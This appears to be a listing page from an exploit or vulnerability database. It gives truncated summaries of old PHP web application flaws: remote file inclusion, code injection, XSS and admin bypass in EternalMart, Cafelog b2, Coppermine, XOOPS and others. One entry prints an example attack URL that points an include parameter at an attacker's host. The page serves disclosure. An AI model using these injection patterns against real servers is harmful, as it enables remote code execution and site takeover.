EMML.txt

Informations : °°°°°°°°°°°°° Language : PHP ------------------------------------------------- Produit : EMML EternalMart Mailing List Manager Version : 1.32 ------------------------------------------------- Produit : EMGB EternalMart Guestbook Version : 1.1...

EternalMart Mailing List Manager 1.32 - Remote File Inclusion

source: https://www.securityfocus.com/bid/8767/info EternalMart Mailing List Manager and Guestbook are prone to remote file-include vulnerabilities. Remote attackers may cause malicious PHP code to run on the webserver. http://target/admin/auth.php?emmladminpath=http://attacker will include the...

CVE-2003-0559

mainfile.php in phpforum 2 RC-1, and possibly earlier versions, allows remote attackers to execute arbitrary PHP code by modifying the MAINPATH parameter to reference a URL on a remote web server that contains the code...

BBCode XSS in XOOPS CMS

Informations : °°°°°°°°°°°°° Language : PHP Bugged Versions : 1.3.x and less + 2.0.x and less ? not checked Safe Version : 2.0.3 Website : http://www.xoops.org Problem : BBcode XSS PHP Code/Location : °°°°°°°°°°°°°°°°°°° This hole can be used in modules : - Private Messages - News - NewBB forum...

PUPET-simpnews.txt

original File name : PUPET-simpnews.txt date releases : july 15, 2003 Informations : ========================= Advisory Name: Simpnews include file Vulnerability Author: PUPET Discover by: PUPET Website vendor : http://www.boesch-it.de/ Versions : tested on V2.01 - V2.13 Problem : Include file PH...

CVE-2003-0559

mainfile.php in phpforum 2 RC-1, and possibly earlier versions, allows remote attackers to execute arbitrary PHP code by modifying the MAINPATH parameter to reference a URL on a remote web server that contains the code...

CVE-2003-1086

PHP remote file inclusion vulnerability in pm/lib.inc.php in pMachine Free and pMachine Pro 2.2 and 2.2.1 allows remote attackers to execute arbitrary PHP code by modifying the pmpath parameter to reference a URL on a remote web server that contains the code...

Zentrack 2.2/2.3/2.4 - 'index.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/7843/info A remote file include vulnerability has been reported for Zentrack. Due to insufficient sanitization of some user-supplied variables by the 'index.php' script, it is possible for a remote attacker to include a malicious PHP file in a URL. If the...

Cafelog b2 0.6 - Remote File Inclusion

Cafelog b2 0.6 - Remote File Inclusion source: https://www.securityfocus.com/bid/7738/info A remote file include vulnerability has been reported for Cafelog. Due to insufficient sanitization of some user-supplied variables by the 'blogger-2-b2.php' and 'gm-2-b2.php' scripts, it is possible for a...

CVE-2003-0320

header.php in ttCMS 2.3 and earlier allows remote attackers to inject arbitrary PHP code by setting the ttcmsuseradmin parameter to "1" and modifying the adminroot parameter to point to a URL that contains a Trojan horse header.inc.php script...

CVE-2003-0275

SSI.php in YaBB SE 1.5.2 allows remote attackers to execute arbitrary PHP code by modifying the sourcedir parameter to reference a URL on a remote web server that contains the code...

miniPortail (PHP) : Admin Access

Informations : °°°°°°°°°°°°°° Language : PHP Website : http://www.aldweb.com/ Version : 1.9, 2.0, 2.1, 2.2 and less ? Problem : Admin Access PHP Code/Location : °°°°°°°°°°°°°°°°°°° admin/admin.php :...

truegalerie.txt

Informations : °°°°°°°°°°°°°° Language : PHP Website : http://www.truelogik.net Version : 1.0 Problems : - Admin Access - File Copy PHP Code/Location : °°°°°°°°°°°°°°°°°°° verifadmin.php, checkadmin.php : ------------------------------------------------------------------------ "; echo ""; echo...

CVE-2002-1466

CafeLog b2 Weblog Tool 2.06pre4, with allowfopenurl enabled, allows remote attackers to execute arbitrary PHP code via the b2inc variable...

Coppermine Photo Gallery 1.0 - PHP Code Injection

source: https://www.securityfocus.com/bid/7300/info Coppermine Photo Gallery has been reported prone to PHP code injection attacks. Due to a lack of sufficient sanitization performed on user-supplied filenames that are uploaded into the Photo Gallery, an attacker may upload a malicious JPEG. The...

Coppermine Photo Gallery 1.0 - PHP Code Injection

Coppermine Photo Gallery 1.0 - PHP Code Injection source: https://www.securityfocus.com/bid/7300/info Coppermine Photo Gallery has been reported prone to PHP code injection attacks. Due to a lack of sufficient sanitization performed on user-supplied filenames that are uploaded into the Photo...

PHPSysInfo 2.0/2.1 - 'index.php' LNG File Disclosure

source: https://www.securityfocus.com/bid/7286/info PHPSysInfo has been reported to be vulnerable to a file disclosure issue. Local users may be capable of influencing the include path for PHPSysinfo language include files. If the malicious language file is symlinked to a web server readable file...

CVE-2002-0451

filemanagerforms.php in PHProjekt 3.1 and 3.1a allows remote attackers to execute arbitrary PHP code by specifying the URL to the code in the libpath parameter...

CVE-2002-0451

PHProjekt 3.1 and 3.1a contain a remote PHP code execution vulnerability in filemanager_forms.php. The issue arises from unsafely handling the lib_path parameter, allowing an attacker to specify a URL to executable code, enabling arbitrary code execution on the affected server. The CVE entry prov...

CVE-2002-1466

The CVE-2002-1466 entry affects CafeLog b2 Weblog Tool 2.06pre4 when allow_fopen_url is enabled. The vulnerability allows remote attackers to execute arbitrary PHP code via the b2inc variable, enabling full compromise of affected installations. The root cause is the ability to reference or includ...